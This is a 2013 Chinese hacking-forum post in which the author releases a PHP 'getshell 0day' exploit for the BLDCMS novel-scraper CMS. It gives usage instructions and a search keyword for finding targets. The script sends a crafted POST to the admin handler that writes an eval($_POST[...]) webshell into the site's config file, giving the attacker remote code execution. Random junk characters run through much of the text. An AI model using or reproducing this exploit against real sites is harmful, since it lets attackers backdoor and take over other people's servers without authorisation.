之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
( K" w$ {7 v" r. n- p: J
+ c* e8 b P) t- Y0 b) d
2 N4 q8 E: ~) a$ }' ]话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
; Y) J- Z0 ]6 p
1 R9 ^$ `9 P% s: s既然都有人发了 我就把我之前写好的EXP放出来吧7 E" O4 A5 ~. M9 P4 g
. m3 f8 }9 \& {4 iview source print?01.php;"># w4 J" Y! R2 ~9 ]# O- G
02.<!--?php
1 f2 ?4 M- m; c3 \ ?1 k03.echo "-------------------------------------------------------------------, w) ?7 G$ k3 E# ~
04.
* A" O; z9 ~9 D$ Z! U4 V05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP7 D& S ~/ Q) F1 i
06.
: d A. e4 M. S a/ v07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
$ n; m- J. \3 u% w08.
% ^9 `' `+ L1 _7 |/ E09.QQ:981009941\r\n 2013.3.21\r\n ) d8 `% D: \* a- P0 Z/ ]' i
10.
- w) h- ]( H$ [9 z/ f11. & l3 M K/ J, q$ w* A
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
% y9 a# Y3 w% s% L5 ~# \# g# R13.
$ U+ X" I& r# `8 d' |: ?+ b* R14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------, a* v% l5 E0 A
15. ) A; ` M/ G9 c
16.--------------------------------------------------------------------\r\n";2 v5 ~0 [2 G; O7 f
17.$url=$argv[1];) V1 e3 A% U0 ^& D% h$ x
18.$dir=$argv[2];
5 N E- g: ]3 E% S- U2 o# U19.$pass=$argv[3];; G( z5 F/ g t% R2 j+ X2 b# ^
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
( D( V: S/ C" F21.if (emptyempty($pass)||emptyempty($url))8 E3 _: H- a1 Y0 g* K
22.{exit("请输入参数");}
; C% W( f" }# B( E23.else
- T; x* W) x' Y; R5 U; @$ E24.{
( C$ o7 D* v" }# P6 a25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev" p& o" _7 v2 s/ B+ k! S
26. 8 I1 q, v4 N* h/ S% l9 |0 G$ n
27.al;
6 u* \9 X+ Y# `* I28.$length = strlen($fuckdata);& l- l- O8 K" s; |
29.function getshell($url,$pass)
0 c+ F& `5 y' I* X30.{! N0 p) Y# Y6 X/ Z
31.global $url,$dir,$pass,$eval,$length,$fuckdata;' [ t/ N* Q% T" `1 ]9 M
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
{5 L2 k3 Y) u" O- C33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";9 d5 k# _( |8 k% z
34.$header .= "User-Agent: MSIE\r\n";
7 }% ?& o% Q% z+ W& B+ @7 H) q35.$header .= "Host:".$url."\r\n";0 D8 I0 S% z# r) Y- ^
36.$header .= "Content-Length: ".$length."\r\n";. O3 f, X% `: r, f
37.$header .= "Connection: Close\r\n";
7 }- `) t- N& R, F' y* F38.$header .="\r\n";3 C& i/ |* o5 j A7 _% A& h8 M& J7 b& T
39.$header .= $fuckdata."\r\n\r\n"; r. g! i: {% l4 y X5 s9 Z
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
% x% n6 B9 F) F% D5 p3 n+ C/ m; A41.if (!$fp)
8 {$ c9 ]8 l1 `( ~" Z% f( d; P1 z42.{5 g2 P$ v; `' r8 [) o W
43.exit ("利用失败:请检查指定目标是否能正常打开");
' w0 u5 x; Z- T6 l+ D& S: `$ K% {! S44.}
- i; B, l3 {9 v8 |7 p3 V! K45.else{ if (!fputs($fp,$header))% u1 l) N @6 ?# D0 _# C# |
46.{exit ("利用失败");}0 v6 v3 ]. ?( x- H9 D9 _8 k2 C
47.else
6 {% V6 g+ ~; h7 K" T# r9 z48.{
+ N H- k4 c3 W1 R4 h' l6 R+ p' Z49.$receive = '';
6 Z/ l; b+ e* a5 k+ W50.while (!feof($fp)) {5 Y) O Z2 a I- B
51.$receive .= @fgets($fp, 1000);- x& W, h& |3 F8 _7 Z
52.}
; H. S0 _* t c7 P5 g7 S0 f- R2 {4 |53.@fclose($fp); c. U" p# s$ ?, r# }. l9 K. J4 n
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标7 f; Z0 n j0 Z: Z
55.
$ @9 {- }8 f" ]* _6 Y56.GPC是否=off)";
& B/ \# Y8 Q* G, M57.}}+ F% B; m4 \* M) P5 L# S0 v! J
58.}0 v j9 O; \2 U1 S0 W, w7 t
59.}
- D2 w3 Y2 c' b% p2 v60.getshell($url,$pass);6 ]; |+ E: V' E) u( i) ^. ?2 H
61.?-->
2 R! p" N6 D8 y& ~8 n' i ' |# K$ ^8 B9 G4 U0 S5 v' j6 _! o
: n8 K% c6 t( S( h ! r3 z& V7 X4 v0 @ m
by 数据流. x6 h( B9 r4 q* H+ l
|
发表于 2013-3-26 20:49:10
收藏
支持
反对